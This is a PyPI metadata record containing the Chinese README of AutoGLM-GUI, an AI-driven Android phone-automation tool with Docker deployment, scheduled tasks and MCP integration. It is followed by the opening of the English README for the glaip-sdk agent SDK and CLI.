| 🐧 **Linux** (x64) | [📦 下载 AppImage](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/AutoGLM.GUI-1.5.5.AppImage) \| [deb](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/autoglm-gui_1.5.5_amd64.deb) \| [tar.gz](https://github.com/suyiiyii/AutoGLM-GUI/releases/download/v1.5.5/autoglm-gui-1.5.5.tar.gz) | 通用格式,支持主流发行版 |
</div>
**使用说明:**
- **Windows**: 下载后直接双击 `.exe` 文件运行,无需安装
- **macOS**: 下载后双击 `.dmg` 文件,拖拽到应用程序文件夹。首次打开可能需要在「系统设置 → 隐私与安全性」中允许运行
- **Linux**:
- **AppImage**(推荐): 下载后添加可执行权限 `chmod +x AutoGLM*.AppImage`,然后直接运行
- **deb**: 适用于 Debian/Ubuntu 系统,使用 `sudo dpkg -i autoglm*.deb` 安装
- **tar.gz**: 便携版,解压后运行 `./AutoGLM\ GUI/autoglm-gui`
> 💡 **提示**: 桌面版已内置所有依赖(Python、ADB 等),无需手动配置环境。首次运行时需配置模型服务 API。
**自动更新:**
AutoGLM GUI 桌面版支持自动更新功能:
- **🪟 Windows 安装版**:启动时自动检测更新,下载完成后退出时自动安装
- **🍎 macOS DMG**:启动时自动检测更新,下载完成后提示用户重启(未签名应用可能需要手动允许)
- **🐧 Linux AppImage**:启动时自动检测更新(需配合 [AppImageLauncher](https://github.com/TheAssassin/AppImageLauncher))
- **便携版(Windows EXE/Linux tar.gz)**:不支持自动更新,请手动下载新版本
---
**或者使用 Python 包(需要 Python 环境):**
```bash
# 通过 pip 安装(推荐)
pip install autoglm-gui
# 或使用 uvx 免安装运行(需先安装 uv)
uvx autoglm-gui
```
## 📸 界面预览
快速跳转: [普通模式](#mode-classic) · [分层代理(增强)](#mode-layered)
### 分层代理
**分层代理(Layered Agent)** 是更“严格”的两层结构:**规划层**专注任务拆解与多轮推理,**执行层**专注观察与操作。规划层会通过工具调用(可在界面中看到每次调用与结果)来驱动执行层完成一个个原子子任务,便于边执行边调整策略,适合需要多轮交互/推理的高级任务。
<img width="939" height="851" alt="图片" src="https://github.com/user-attachments/assets/c054d998-726d-48ed-99e7-bb33581b3745" />
### 任务开始

### 任务执行完成

### 多设备控制

## 🚀 快速开始
### 前置要求
- Android 设备(Android 11+ 支持完全无线配对,无需数据线)
- 一个 OpenAI 兼容的 API 端点(支持智谱 BigModel、ModelScope 或自建服务)
**关于设备连接**:
- **Android 11+**:支持二维码扫码配对,完全无需数据线即可连接和控制设备
- **Android 10 及更低版本**:需要先通过 USB 数据线连接并开启无线调试,之后可拔掉数据线无线使用
### 方式一:Python 包安装(推荐)
**无需手动准备环境,直接安装运行:**
```bash
# 通过 pip 安装并启动
pip install autoglm-gui
autoglm-gui --base-url http://localhost:8080/v1
```
也可以使用 uvx 免安装启动,自动启动最新版(需已安装 uv,[安装教程](https://docs.astral.sh/uv/getting-started/installation/)):
```bash
uvx autoglm-gui --base-url http://localhost:8080/v1
```
### 方式二:Docker 部署(推荐生产力场景)
AutoGLM-GUI 提供预构建的 Docker 镜像,支持 `linux/amd64` 和 `linux/arm64` 架构,**适合部署到服务器 7x24 小时运行**,配合定时任务功能实现自动化中枢。
**核心优势**:
- 🚀 **一键部署**:无需配置 Python 环境和依赖
- ⏰ **定时执行**:配合内置定时任务系统,自动化执行周期性操作
- 🌐 **远程控制**:通过 Web 界面随时随地管理设备
- 📊 **稳定运行**:容器化隔离,适合长期运行
**使用 docker-compose(推荐):**
```bash
# 1. 下载 docker-compose.yml
curl -O https://raw.githubusercontent.com/suyiiyii/AutoGLM-GUI/main/docker-compose.yml
# 2. 启动服务
docker-compose up -d
# 3. 访问 http://localhost:8000,在 Web 界面中配置模型 API
```
**或直接使用 docker run:**
```bash
# 使用 host 网络模式运行(推荐)
docker run -d --network host \
-v autoglm_config:/root/.config/autoglm \
-v autoglm_logs:/app/logs \
ghcr.io/suyiiyii/autoglm-gui:main
# 访问 http://localhost:8000,在 Web 界面中配置模型 API
```
**配置说明**:
- 默认使用 host 网络模式(推荐,便于 ADB 设备发现和二维码配对)
- 模型 API 配置可以在 Web 界面的设置页面中完成,无需提前配置环境变量
- 如果需要在启动时预配置,可以编辑 `docker-compose.yml` 取消注释 `environment` 部分
**连接远程设备**:
Docker 容器中连接 Android 设备推荐使用 **WiFi 调试**:
1. 在 Android 设备上开启「开发者选项」→「无线调试」
2. 记录设备的 IP 地址和端口号
3. 在 Web 界面点击「添加无线设备」→ 输入 IP:端口 → 连接
> ⚠️ **注意**:二维码配对功能依赖 mDNS 多播,在 Docker bridge 网络中可能受限。**强烈建议使用 `--network host` 模式**以获得完整功能支持。
**更多 Docker 配置选项**,请参见下方的 [Docker 部署详细说明](#-docker-部署详细说明)。
---
启动后,在浏览器中打开 http://localhost:8000 即可开始使用!
### 🎯 模型服务配置
AutoGLM-GUI 只需要一个 OpenAI 兼容的模型服务。你可以:
- 使用官方已托管的第三方服务
- 智谱 BigModel:`--base-url https://open.bigmodel.cn/api/paas/v4`,`--model autoglm-phone`,`--apikey <你的 API Key>`
- ModelScope:`--base-url https://api-inference.modelscope.cn/v1`,`--model ZhipuAI/AutoGLM-Phone-9B`,`--apikey <你的 API Key>`
- 或自建服务:参考上游项目的[部署文档](https://github.com/zai-org/Open-AutoGLM/blob/main/README.md)用 vLLM/SGLang 部署 `zai-org/AutoGLM-Phone-9B`,启动 OpenAI 兼容端口后将 `--base-url` 指向你的服务。
示例:
```bash
# 使用智谱 BigModel
pip install autoglm-gui
autoglm-gui \
--base-url https://open.bigmodel.cn/api/paas/v4 \
--model autoglm-phone \
--apikey sk-xxxxx
# 使用 ModelScope
pip install autoglm-gui
autoglm-gui \
--base-url https://api-inference.modelscope.cn/v1 \
--model ZhipuAI/AutoGLM-Phone-9B \
--apikey sk-xxxxx
# 指向你自建的 vLLM/SGLang 服务
pip install autoglm-gui
autoglm-gui --base-url http://localhost:8000/v1 --model autoglm-phone-9b
```
## 🔄 升级指南
### 检查当前版本
```bash
# 查看已安装的版本
pip show autoglm-gui
# 或使用命令行参数
autoglm-gui --version
```
### 升级到最新版本
**使用 pip 升级:**
```bash
# 升级到最新版本
pip install --upgrade autoglm-gui
```
## 📖 使用说明
### 多设备管理
AutoGLM-GUI 支持同时控制多个 Android 设备:
1. **设备列表** - 左侧边栏自动显示所有已连接的 ADB 设备
2. **设备选择** - 点击设备卡片切换到对应的控制面板
3. **状态指示** - 清晰显示每个设备的在线状态和初始化状态
4. **状态隔离** - 每个设备有独立的对话历史、配置和视频流
**设备状态说明**:
- 🟢 绿点:设备在线
- ⚪ 灰点:设备离线
- ✓ 标记:设备已初始化
#### 📱 二维码无线配对(Android 11+ 推荐)
**完全无需数据线**,手机和电脑只需在同一 WiFi 网络即可:
1. **手机端准备**:
- 打开「设置」→「开发者选项」→ 开启「无线调试」
- 保持手机和电脑连接到同一个 WiFi 网络
2. **电脑端操作**:
- 点击界面左下角的 ➕ 「添加无线设备」按钮
- 切换到「配对设备」标签页
- **二维码自动生成**,等待扫码
3. **手机端扫码**:
- 在「无线调试」页面,点击「使用二维码配对设备」
- 扫描电脑上显示的二维码
- 配对成功后,设备会自动出现在设备列表中
**特点**:
- ✅ 完全无需数据线
- ✅ 一键扫码即可配对
- ✅ 自动发现并连接设备
- ✅ 适用于 Android 11 及以上版本
### AI 自动化模式
1. **连接设备** - 使用上述任一方式连接设备(推荐 Android 11+ 的二维码配对)
2. **选择设备** - 在左侧边栏选择要控制的设备
3. **初始化** - 点击"初始化设备"按钮配置 Agent
4. **对话** - 描述你想要做什么(例如:"去美团点一杯霸王茶姬的伯牙绝弦")
5. **观察** - Agent 会逐步执行操作,每一步的思考过程和动作都会实时显示
### 🤖 选择 Agent 类型
在初始化设备时,可以选择不同的 Agent 类型(默认:GLM Agent):
- **GLM Agent**:基于 GLM 模型优化,成熟稳定,适合大多数任务
- **MAI Agent**:**内部实现**的 Mobile Agent,支持多张历史截图上下文,适合复杂任务
- 🆕 **现已完全内部化**:移除 ~1200 行第三方依赖,性能优化,中文适配
- 🔄 **向后兼容**:需要使用旧版本可选择 `mai_legacy` 类型
MAI Agent 可配置参数:
- `history_n`:历史截图数量(1-10,默认:3)
**MAI Agent 增强特性**(v1.5.0+):
- ✅ 流式思考输出(实时显示推理过程)
- ✅ 中文优化 Prompt(针对国内应用场景)
- ✅ 性能监控(LLM 耗时、动作执行统计)
- ✅ 详细的操作指南和错误避免提示
<a id="mode-classic"></a>
### 🌿 普通模式(单模型 / Open AutoGLM)
这是**开源 AutoGLM-Phone 的“原生形态”**:由一个视觉模型直接完成「理解任务 → 规划步骤 → 观察屏幕 → 执行动作」的完整闭环。
- **优点**:配置最简单,上手最快
- **适用场景**:目标明确、步骤较少的任务(例如打开应用、简单导航)
<a id="mode-layered"></a>
### 🧩 分层代理模式(Layered Agent,增强 / 实验性)
分层代理模式是更“严格”的两层结构:**规划层**专注拆解与推理,**执行层**专注观察与操作,二者通过工具调用协作完成任务。
- **工作方式**:规划层(决策模型)会调用工具(如 `list_devices()` / `chat(device_id, message)`)去驱动执行层;你能在界面里看到每次工具调用与返回结果
- **执行粒度**:执行层每次只做一个“原子子任务”,并有步数上限(例如每次最多 5 步),便于规划层按反馈动态调整策略
- **适用场景**:需要多轮推理、需要“边看边问边改计划”的复杂任务(例如浏览/筛选/对比、多轮表单填写等)
- **重要限制**:执行层不负责"记笔记/保存中间信息/直接提取文本变量";规划层需要信息时必须通过提问让执行层把屏幕内容"念出来"
> 📖 **深入了解**:查看 [Layered Agent 架构分析文档](./docs/docs/layered_agent_analysis.md) 了解技术原理、数据流和实现细节
### 🎭 两种工作模式对比
AutoGLM-GUI 提供了两种不同的代理工作模式,适用于不同的使用场景:
#### 1️⃣ 经典模式(Classic Mode)
- **架构**:单一 `autoglm-phone` 视觉模型直接处理(即普通 Open AutoGLM 的体验)
- **适用场景**:简单、明确的任务
- **特点**:配置简单,适合快速上手
#### 2️⃣ 分层代理(Layered Agent)
- **架构**:基于 Agent SDK 的分层任务执行系统
- **规划层**:决策模型作为高级智能中枢,负责任务拆解和多轮推理
- **执行层**:autoglm-phone 作为执行者,只负责观察和操作
- **适用场景**:需要多轮交互和复杂推理的高级任务
- **特点**:规划层通过工具调用驱动执行层,过程更透明、更便于调试与迭代策略
**选择建议**:
- 🚀 **常规任务(订外卖、打车)**:经典模式
- 🏗️ **需要多轮推理的任务**:分层代理模式
### 手动控制模式
除了 AI 自动化,你也可以直接在实时画面上操控手机:
1. **实时画面** - 设备面板右侧显示手机屏幕的实时视频流(基于 scrcpy)
2. **点击操作** - 直接点击画面中的任意位置,操作会立即发送到手机
3. **滑动手势** - 按住鼠标拖动实现滑动操作(支持滚轮滚动)
4. **视觉反馈** - 每次操作都会显示涟漪动画和成功/失败提示
5. **精准转换** - 自动处理屏幕缩放和坐标转换,确保操作位置准确
6. **显示模式** - 支持自动、视频流、截图三种显示模式切换
### ⏰ 定时任务调度(生产力核心功能)
AutoGLM-GUI 内置定时任务系统,让 AI 按照你的计划自动执行操作,打造 7x24 小时的自动化助手。
**典型应用场景**:
- 📅 **每日签到**:自动在指定时间完成 App 签到领取积分
- 🔔 **定时检查**:定期检查订单状态、物流信息、库存变化
- 📧 **消息提醒**:定时发送消息、提醒事项
- 🎮 **游戏任务**:自动完成每日任务、领取奖励
- 💰 **价格监控**:定期检查商品价格变化,自动下单
**如何使用**:
1. **创建定时任务** - 在 Web 界面的"定时任务"页面创建新任务
2. **设置 Cron 表达式** - 使用 Cron 语法指定执行时间(例如:`0 8 * * *` 表示每天早上 8 点)
3. **选择执行设备** - 指定要控制的 Android 设备
4. **定义任务内容** - 描述要执行的操作(支持使用已保存的 Workflow)
5. **启用任务** - 开启任务后,系统会在指定时间自动执行
**Docker 部署推荐**:
- 将 AutoGLM-GUI 部署到服务器上(VPS、NAS、闲置电脑)
- 通过 WiFi 连接 Android 设备
- 服务器 7x24 小时运行,确保定时任务按时执行
- 通过 Web 界面随时查看执行历史和日志
**对话历史支持**:
- 所有定时任务的执行记录自动保存
- 支持查看历史执行详情、追溯问题
- 失败任务自动记录错误信息
### Workflow 工作流管理
将常用任务保存为 Workflow,实现一键快速执行:
#### 创建和管理 Workflow
1. **进入管理页面** - 点击左侧导航栏的 Workflows 图标(📋)
2. **新建 Workflow** - 点击右上角"新建 Workflow"按钮
3. **填写信息**:
- **名称**:给 Workflow 起一个简短易记的名称(如:"订购霸王茶姬")
- **任务内容**:详细描述要执行的任务(如:"去美团点一杯霸王茶姬的伯牙绝弦,要去冰,加珍珠")
4. **保存** - 点击保存按钮即可
**管理操作**:
- **编辑** - 点击 Workflow 卡片上的"编辑"按钮修改内容
- **删除** - 点击"删除"按钮移除不需要的 Workflow
- **预览** - Workflow 卡片显示任务内容的前几行预览
#### 快速执行 Workflow
在 Chat 界面执行已保存的 Workflow:
1. **选择设备** - 确保已选择并初始化目标设备
2. **打开 Workflow 选择器** - 点击输入框旁边的 Workflow 按钮(📋 图标)
3. **选择要执行的任务** - 从列表中点击你想执行的 Workflow
4. **自动填充** - 任务内容会自动填入输入框
5. **发送执行** - 点击发送按钮开始执行
**使用场景示例**:
- 📱 **日常任务**:订外卖、打车、查快递
- 🎮 **游戏操作**:每日签到、领取奖励
- 📧 **消息发送**:固定内容的消息群发
- 🔄 **重复操作**:定期执行的维护任务
### 📚 对话历史管理(v1.5.0 新增)
所有对话和执行记录自动保存到本地数据库,支持随时查看和追溯:
**核心功能**:
- 💾 **自动保存**:所有对话内容、AI 思考过程、执行步骤完整记录
- 🔍 **历史查看**:在 Web 界面查看所有历史对话
- 📊 **执行追溯**:详细查看每次任务的执行过程,包括截图、操作、结果
- ⏰ **定时任务日志**:定时任务的执行记录自动关联到对话历史
- 🐛 **问题诊断**:失败任务可查看完整日志,快速定位问题
**使用场景**:
- 回顾 AI 的决策过程,优化 Prompt 和任务描述
- 追溯定时任务的执行情况,确认是否按时完成
- 查找历史操作记录,复用成功的执行策略
- 问题排查时查看详细日志和截图
**数据存储**:
- 默认存储位置:`~/.config/autoglm/history.db`(SQLite 数据库)
- Docker 部署:挂载 volume 确保数据持久化
- 支持导出和备份
## 🎯 生产力场景示例
AutoGLM-GUI v1.5 已从单纯的"手机助手"升级为"AI 自动化中枢",以下是典型的生产力应用场景:
### 场景 1:服务器定时自动化
**配置**:
```bash
# 在 VPS/NAS 上部署 Docker
docker-compose up -d
# 通过 WiFi 连接 Android 设备
# 在 Web 界面配置定时任务
```
**典型任务**:
- ⏰ 每天早上 8:00 自动签到领积分
- ⏰ 每晚 22:00 检查订单状态并发送通知
- ⏰ 每小时检查特定商品价格变化
- ⏰ 每天中午 12:00 自动点外卖
**价值**:AI 助手 7x24 小时运行在服务器上,无需人工干预
### 场景 2:多设备批量管理
**配置**:
- 连接 3-5 台 Android 设备(USB 或 WiFi)
- 每台设备执行不同的自动化任务
**典型任务**:
- 设备 A:电商平台价格监控 + 自动比价
- 设备 B:社交媒体内容定时发布
- 设备 C:游戏挂机 + 每日任务
- 设备 D:物流信息监控 + 状态推送
**价值**:一个控制台管理多台设备,规模化自动化
### 场景 3:开发调试 + CI/CD
**配置**:
```bash
# 使用模拟器进行自动化测试
# 模拟器零配置,自动检测连接
```
**典型任务**:
- 🧪 自动化 UI 测试(回归测试)
- 📱 App 安装/卸载/升级测试
- 🔄 多版本兼容性验证
- 📊 性能测试数据采集
**价值**:结合 CI/CD 流程,实现移动端自动化测试
### 场景 4:个人效率提升
**配置**:
- 本地运行桌面版或 Python 包
- 定义常用 Workflow
**典型任务**:
- 📝 早会前自动整理昨日工作记录
- 💰 自动记录每日支出到记账 App
- 📧 定时发送固定格式的周报邮件
- 🏃 健身 App 自动打卡记录
**价值**:减少重复性工作,专注创造性任务
### 关键技术组合
| 功能组合 | 适用场景 |
|---------|---------|
| 定时任务 + Docker + WiFi 连接 | 服务器端 7x24 自动化 |
| 多设备 + Workflow + 对话历史 | 批量设备管理 + 操作追溯 |
| 分层代理 + 立即打断 + 实时预览 | 复杂任务调试与优化 |
| 模拟器直连 + CI/CD 集成 | 自动化测试流程 |
## 🛠️ 开发指南
### 源码安装
如果你需要从源码进行开发或定制,可以按照以下步骤:
```bash
# 1. 克隆仓库
git clone https://github.com/suyiiyii/AutoGLM-GUI.git
cd AutoGLM-GUI
# 2. 安装依赖
uv sync
# 3. 构建前端(必须)
uv run python scripts/build.py
# 4. 启动服务
uv run autoglm-gui --base-url http://localhost:8080/v1
```
### 快速开发
```bash
# 后端开发(自动重载)
uv run autoglm-gui --base-url http://localhost:8080/v1 --reload
# 前端开发服务器(热重载)
cd frontend && pnpm dev
```
### 构建和打包
```bash
# 仅构建前端
uv run python scripts/build.py
# 构建完整包
uv run python scripts/build.py --pack
```
## 🔌 MCP (Model Context Protocol) 集成
AutoGLM-GUI 内置了 MCP 服务器,可以作为一个工具集成为其他 AI 应用(如 Claude Desktop、Cline、Cursor 等)提供 Android 设备自动化能力。
### 什么是 MCP?
MCP (Model Context Protocol) 是一个开放协议,允许 AI 应用连接到外部数据源和工具。通过 MCP,你可以让 Claude、Cursor 等 AI 直接操作你的 Android 设备。
### MCP Tools
AutoGLM-GUI 提供了两个 MCP 工具:
#### 1. `chat(device_id, message)` - 执行手机任务
向指定设备发送自动化任务,AI 会控制手机完成操作。
**参数**:
- `device_id`:设备标识符(如 "192.168.1.100:5555" 或设备序列号)
- `message`:自然语言任务描述(如 "打开微信"、"发送消息")
**特点**:
- ✅ 自动初始化设备(使用全局配置)
- ✅ **Fail-Fast 策略**:找不到元素立即报错,不猜测坐标
- ✅ **5 步限制**:适合原子操作,避免无限循环
- ✅ **专用 Prompt**:优化为快速执行模式
#### 2. `list_devices()` - 列出已连接设备
获取所有已连接的 ADB 设备列表及其状态。
**返回信息**:
- 设备 ID、型号
- 连接类型(USB/WiFi)
- 在线状态
- Agent 初始化状态
### 使用场景
**典型应用**:
- 🤝 **Claude Desktop**:让 Claude 直接操作你的 Android 设备
- 💻 **IDE 集成**:在 Cursor、VS Code (Cline) 中调用手机自动化
- 🔄 **工作流集成**:作为 AI Agent 工具链的一环
- 🧪 **自动化测试**:结合 AI 进行移动端 UI 测试
**示例**:
```
用户:帮我在手机上打开微信,给张三发消息"下午三点开会"
AI:
1. 调用 list_devices() 找到设备
2. 调用 chat(device_id, "打开微信")
3. 调用 chat(device_id, "搜索联系人张三")
4. 调用 chat(device_id, "发送消息:下午三点开会")
```
### 配置 MCP 客户端
#### Claude Desktop 配置
1. **启动 AutoGLM-GUI**(确保 MCP 端点可访问):
```bash
# 使用默认 MCP 端点(挂载在 /mcp)
autoglm-gui --base-url http://localhost:8080/v1
```
2. **编辑 Claude Desktop 配置文件**:
**macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
**Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
添加以下配置:
```json
{
"mcpServers": {
"autoglm-gui": {
"transport": {
"type": "http",
"url": "http://localhost:8000/mcp"
}
}
}
}
```
3. **重启 Claude Desktop**,即可在对话中使用 AutoGLM-GUI 工具。
#### Cline (VS Code) 配置
在 VS Code 设置中搜索 "cline",添加 MCP 服务器配置:
```json
{
"cline.mcpServers": {
"autoglm-gui": {
"transport": {
"type": "http",
"url": "http://localhost:8000/mcp"
}
}
}
}
```
#### Cursor 配置
在 Cursor 设置中添加 MCP 服务器(设置 → MCP Servers):
```json
{
"mcpServers": {
"autoglm-gui": "http://localhost:8000/mcp"
}
}
```
### MCP 端点说明
AutoGLM-GUI 的 MCP 服务器通过 HTTP 端点暴露:
- **Base URL**:`http://localhost:8000/mcp`
- **传输协议**:HTTP + SSE (Server-Sent Events)
- **端口**:跟随主服务端口(默认 8000)
**端点路径**:
- `/mcp/sse` - SSE 传输端点
- `/mcp/messages` - 消息端点
### 技术架构
**实现方式**:
- 基于 **FastMCP** 库构建
- MCP HTTP App 挂载到 FastAPI 的根路径 `/`
- 使用 ASGI 应用集成,与 FastAPI 生命周期合并
- 设备锁管理:使用 `PhoneAgentManager.use_agent` 上下文管理器
**专用 Prompt 特性**:
- **Fail-Fast**:找不到元素立即报错,禁止猜测坐标
- **Step Limit**:5 步未完成自动中断
- **目标验证**:执行前必须确认元素在屏幕上可见
- **错误规范**:使用 `ELEMENT_NOT_FOUND` 和 `STEP_LIMIT_EXCEEDED` 标准化错误
### 最佳实践
1. **原子任务**:MCP 的 `chat` 工具设计用于执行原子操作(5 步内完成),复杂任务应拆分为多个子任务
2. **设备管理**:使用 `list_devices()` 先确认设备在线,再执行操作
3. **错误处理**:AI 应捕获 `ELEMENT_NOT_FOUND` 错误,调整策略后重试
4. **性能优化**:MCP 调用优先使用本地 API(如 vLLM/SGLang),减少网络延迟
### 示例对话
**在 Claude Desktop 中**:
```
用户:帮我查一下手机上有几台设备连接了
Claude:我调用 list_devices() 工具查看一下...
[MCP 工具调用] list_devices()
结果:发现 1 台设备
- 设备 ID: emulator-5554
- 型号: sdk_gphone64_x86_64
- 状态: 在线
用户:在模拟器上打开设置应用
Claude:我调用 chat 工具来操作设备...
[MCP 工具调用] chat("emulator-5554", "打开设置应用")
执行结果:✅ 已完成
步骤 1: Launch(app="设置")
步骤 2: 等待应用加载
步骤 3: 完成
设置应用已成功打开。
```
## 🐳 Docker 部署详细说明
> 💡 **提示**:Docker 部署已整合到 [快速开始](#-快速开始) 部分,推荐直接查看上方的"方式二:Docker 部署"说明。
本节提供更多 Docker 配置选项和高级用法。
### 指定监听端口
如果使用 host 网络模式且需要修改默认端口(8000),可以通过 `command` 参数指定:
```bash
# 监听 9000 端口
docker run -d --network host \
-v autoglm_config:/root/.config/autoglm \
-v autoglm_logs:/app/logs \
ghcr.io/suyiiyii/autoglm-gui:main \
autoglm-gui --host 0.0.0.0 --port 9000 --no-browser
```
如果使用 bridge 网络模式,则使用 `-p` 参数映射端口:
```bash
# 映射主机 9000 端口到容器 8000 端口
docker run -d -p 9000:8000 \
-v autoglm_config:/root/.config/autoglm \
-v autoglm_logs:/app/logs \
ghcr.io/suyiiyii/autoglm-gui:main
```
### 镜像标签
| 标签 | 说明 |
|------|------|
| `main` | 跟随 main 分支最新代码,推荐使用 |
| `<commit-sha>` | 特定 commit 的镜像(如 `abc1234`),用于锁定版本 |
### 环境变量
| 变量 | 说明 | 默认值 |
|------|------|--------|
| `AUTOGLM_BASE_URL` | 模型 API 地址 | (必填) |
| `AUTOGLM_MODEL_NAME` | 模型名称 | `autoglm-phone` |
| `AUTOGLM_API_KEY` | API 密钥 | (必填) |
### 健康检查
```bash
# 检查服务状态
curl http://localhost:8000/api/health
```
## 🤝 如何贡献
我们热烈欢迎社区贡献!无论是修复 bug、添加新功能、改进文档,还是分享使用经验,都对项目有重要价值。
### 🎯 快速开始贡献
1. **查看置顶 Issue** - [🎯 Start Here: 如何贡献 / 认领任务 / 本地跑起来](https://github.com/suyiiyii/AutoGLM-GUI/issues/170)
2. **阅读贡献指南** - 详细步骤请参考 [CONTRIBUTING.md](./CONTRIBUTING.md)
3. **认领任务** - 在感兴趣的 Issue 下评论 `/assign me`
### 💡 贡献方式
- 🐛 **修复 Bug** - 查找标记为 `bug` 的 Issue
- ✨ **添加功能** - 实现标记为 `enhancement` 的需求
- 📖 **改进文档** - 修正错误、补充说明、添加示例
- 🧪 **添加测试** - 提升代码质量和测试覆盖率
- 🌍 **翻译文档** - 帮助更多语言的用户使用
### 🏷️ 新手友好任务
如果你是第一次贡献开源项目,可以从这些任务开始:
- 查找标记为 [`good first issue`](https://github.com/suyiiyii/AutoGLM-GUI/labels/good%20first%20issue) 的 Issue
- 改进文档(修正拼写错误、补充说明)
- 测试软件并报告使用体验
### 📚 参考资源
| 文档 | 说明 |
|------|------|
| [CONTRIBUTING.md](./CONTRIBUTING.md) | 完整的贡献指南(环境配置、开发流程、PR 规范) |
| [CLAUDE.md](./CLAUDE.md) | 技术架构文档(代码结构、关键实现细节) |
| [Issues](https://github.com/suyiiyii/AutoGLM-GUI/issues) | 查看和认领任务 |
### 💬 交流讨论
- 💭 在 Issue 中讨论想法和问题
- 🎮 加入 [QQ 交流群](https://qm.qq.com/q/J5eAs9tn0W)
- 📝 [创建新 Issue](https://github.com/suyiiyii/AutoGLM-GUI/issues/new/choose) 报告问题或提出建议
感谢每一位贡献者,你们让 AutoGLM-GUI 变得更好!🎉
## 📝 开源协议
Apache License 2.0
### 许可证说明
AutoGLM-GUI 打包了 ADB Keyboard APK (`com.android.adbkeyboard`),该组件使用 GPL-2.0 许可证。ADB Keyboard 组件作为独立工具使用,不影响 AutoGLM-GUI 本身的 Apache 2.0 许可。
详见:`AutoGLM_GUI/resources/apks/ADBKeyBoard.LICENSE.txt`
## 🙏 致谢
本项目基于 [Open-AutoGLM](https://github.com/zai-org/Open-AutoGLM) 构建,感谢 zai-org 团队在 AutoGLM 上的卓越工作。
| text/markdown | suyiiyii | null | null | null | null | ai, android, autoglm, automation, gui, phone-agent | [
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: FastAPI",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"apscheduler<4.0.0,>=3.10.0",
"fastapi>=0.124.0",
"fastmcp>=2.0.0",
"httpx[socks]>=0.28.1",
"jinja2>=3.1.0",
"loguru>=0.7.3",
"numpy>=1.24.0",
"openai-agents>=0.6.4",
"openai>=2.9.0",
"pillow>=11.3.0",
"prometheus-client>=0.21.0",
"python-socketio>=5.11.0",
"pyyaml>=6.0.3",
"uvicorn[standard]>=0.38.0",
"zeroconf>=0.148.0"
] | [] | [] | [] | [
"Homepage, https://github.com/suyiiyii/AutoGLM-GUI",
"Repository, https://github.com/suyiiyii/AutoGLM-GUI"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:12:50.981593 | autoglm_gui-1.5.11.tar.gz | 5,858,371 | da/99/caed2f5e32af28025454ffced2362830b3aa53c3b30f56b7d0af7a35a84a/autoglm_gui-1.5.11.tar.gz | source | sdist | null | false | b7b28e99260722279bcb970816cce387 | 11b6d3ce0459659147beddbc599a1973d670ca6468e4e40f1aa44ca32de1f764 | da99caed2f5e32af28025454ffced2362830b3aa53c3b30f56b7d0af7a35a84a | Apache-2.0 | [
"LICENSE"
] | 227 |
2.3 | glaip-sdk | 0.8.5 | Python SDK and CLI for GL AIP (GDP Labs AI Agent Package) - Build, run, and manage AI agents | # GL AIP — GDP Labs AI Agents Package
[](https://www.python.org/downloads/)
[](https://github.com/psf/black)
GL stands for **GDP Labs**—GL AIP is our AI Agents Package for building, running, and operating agents.
> **Python SDK and CLI for GL AIP - Connect, configure, and manage AI agents on the GDP Labs AI Agents Package.**
## 🚀 Quick Start
### Installation
Installing `glaip-sdk` provides both the **Python SDK** and the **`aip` CLI command** in a single package.
```bash
# Using pip (recommended)
pip install --upgrade glaip-sdk
# Using uv (fast alternative)
uv tool install glaip-sdk
# Using pipx (CLI-focused, isolated environment)
pipx install glaip-sdk
```
**Requirements**: Python 3.11 or 3.12
**Updating**: The `aip` CLI automatically detects your installation method and uses the correct update command:
- If installed via `pip`: Uses `pip install --upgrade glaip-sdk`
- If installed via `uv tool install`: Uses `uv tool install --upgrade glaip-sdk`
- You can also update manually using the same command you used to install
## 🐍 Hello World - Python SDK
Perfect for building applications and integrations.
### Step 1: Environment Setup
Create a `.env` file:
```bash
# .env
AIP_API_URL=https://your-gl-aip-instance.com
AIP_API_KEY=your-api-key
```
### Step 2: Basic Python Script
```python
# hello_world.py
from glaip_sdk import Client
import os
from dotenv import load_dotenv
# Load environment variables
load_dotenv()
# Initialize client
client = Client()
# Create a simple agent
agent = client.agents.create(
name="hello-sdk",
instruction="You are a helpful assistant who responds clearly and concisely."
)
# Run the agent
result = agent.run("Hello world, what's 2+2?")
print(f"Agent response: {result}")
```
### Step 3: Run Your Script
```bash
python hello_world.py
```
### Step 4: Advanced Example with Streaming
```python
# streaming_example.py
from glaip_sdk import Client
import os
from dotenv import load_dotenv
load_dotenv()
client = Client()
# Create agent with streaming
agent = client.agents.create(
name="streaming-agent",
instruction="You are a helpful assistant. Provide detailed responses."
)
# Stream the response
print("Streaming response:")
client.agents.run_agent(
agent.id,
"Explain quantum computing in simple terms",
verbose=True,
)
print("--- Stream complete ---")
```
🎉 **SDK Success!** You're now ready to build AI-powered applications with Python.
______________________________________________________________________
## 💻 Hello World - CLI
Perfect for quick testing and command-line workflows.
### Step 1: Configure Connection
```bash
# Interactive setup (recommended)
aip configure
```
Or set environment variables:
```bash
export AIP_API_URL="https://your-gl-aip-instance.com"
export AIP_API_KEY="your-api-key"
```
### Step 2: Verify Connection
```bash
aip status
```
### Step 3: Create & Run Your First Agent
```bash
# Create a simple agent
aip agents create --name "hello-cli" --instruction "You are a helpful assistant"
# List agents to get the ID
aip agents list
# Run the agent with input
aip agents run <AGENT_ID> --input "Hello world, what's the weather like?"
```
🎉 **CLI Success!** You're now ready to use the CLI for AI agent workflows.
## ✨ Key Features
- **🤖 Agent Management**: Create, run, and orchestrate AI agents with custom instructions and streaming
- **🧠 Language Models**: Choose from multiple AI models per agent with manual PII tag mapping
- **🛠️ Tool Integration**: Extend agents with custom Python tools and script management
- **🔌 MCP Support**: Connect external services through Model Context Protocols with tool discovery
- **🔄 Multi-Agent Patterns**: Hierarchical, parallel, sequential, router, and aggregator patterns
- **🎙️ Audio Interface (beta)**: Local-only LiveKit voice sessions for talking to agents (install with `glaip-sdk[audio]`)
